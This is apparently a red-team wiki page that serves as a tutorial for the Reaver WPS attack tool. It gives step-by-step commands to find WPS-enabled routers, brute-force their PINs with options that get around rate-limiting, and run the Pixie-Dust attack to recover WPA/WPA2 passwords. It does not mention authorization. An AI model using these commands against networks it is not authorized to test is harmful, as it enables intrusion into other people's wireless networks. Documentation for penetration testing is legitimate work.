Reaver - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Reaver – WPS Attack Tool

Introduction

Reaver is a tool designed to perform brute-force attacks against Wi-Fi Protected Setup (WPS) PINs, ultimately recovering the WPA/WPA2 passphrase of a target network. It is highly effective against routers with WPS enabled, allowing attackers to bypass traditional WPA/WPA2 password security mechanisms.

Installation

Linux (Debian/Ubuntu)

sudo apt update && sudo apt install reaver -y

Arch Linux

sudo pacman -S reaver

macOS

Reaver is not natively available on macOS, but you can use a Linux VM or Kali Linux in a virtualized environment.

Identifying WPS-Enabled Networks

Before launching an attack, it is crucial to identify which networks have WPS enabled. This can be done using wash, a tool that comes with Reaver.

sudo wash -i wlan0mon --ignore-fcs

Explanation:

  • -i wlan0mon → Specifies the wireless interface in monitor mode.
  • --ignore-fcs → Ignores frame check sequence errors.

This command will list WPS-enabled networks, displaying their BSSID, WPS status, and other relevant details.

Running a Reaver Attack

Once a WPS-enabled network is found, Reaver can start brute-forcing its PIN.

sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv

Explanation:

  • -i wlan0mon → Interface in monitor mode.
  • -b XX:XX:XX:XX:XX:XX → Target BSSID (replace with actual target BSSID).
  • -vv → Enables verbose mode for more detailed output.

Optimizing the Attack

Some routers implement protections against brute-force attempts, so adjusting attack parameters can improve efficiency:

sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -c 6 -a -S -N -vv

Additional Options:

  • -c 6 → Specifies channel 6 (change according to the target).
  • -a → Auto-detect best attack mode.
  • -S → Enables small delay between PIN attempts (useful against rate-limiting).
  • -N → Disables NACK responses to speed up the process.

Checking WPS Lock Status

Some routers lock WPS after multiple failed attempts. To check if WPS is locked:

sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv | grep "WPS transaction failed"

If WPS is locked, you may need to wait before retrying or use Pixie-Dust attack (explained below).

Pixie-Dust Attack (Offline WPS Exploit)

Reaver can integrate with PixieWPS, an offline attack that exploits vulnerabilities in WPS implementations.

  1. Install PixieWPS:
sudo apt install pixiewps -y
  1. Run Reaver in Pixie-Dust mode:
sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -K 1

Explanation:

  • -K 1 → Enables Pixie-Dust attack mode.

If the router is vulnerable, Reaver will instantly recover the WPS PIN and Wi-Fi password without brute force.

Additional Notes

  • Reaver works best with external Wi-Fi adapters that support monitor mode and packet injection.
  • Some modern routers disable WPS by default, making this attack ineffective.
  • Consider using hcxdumptool + hashcat if WPS attacks fail, targeting WPA2 handshakes instead.

References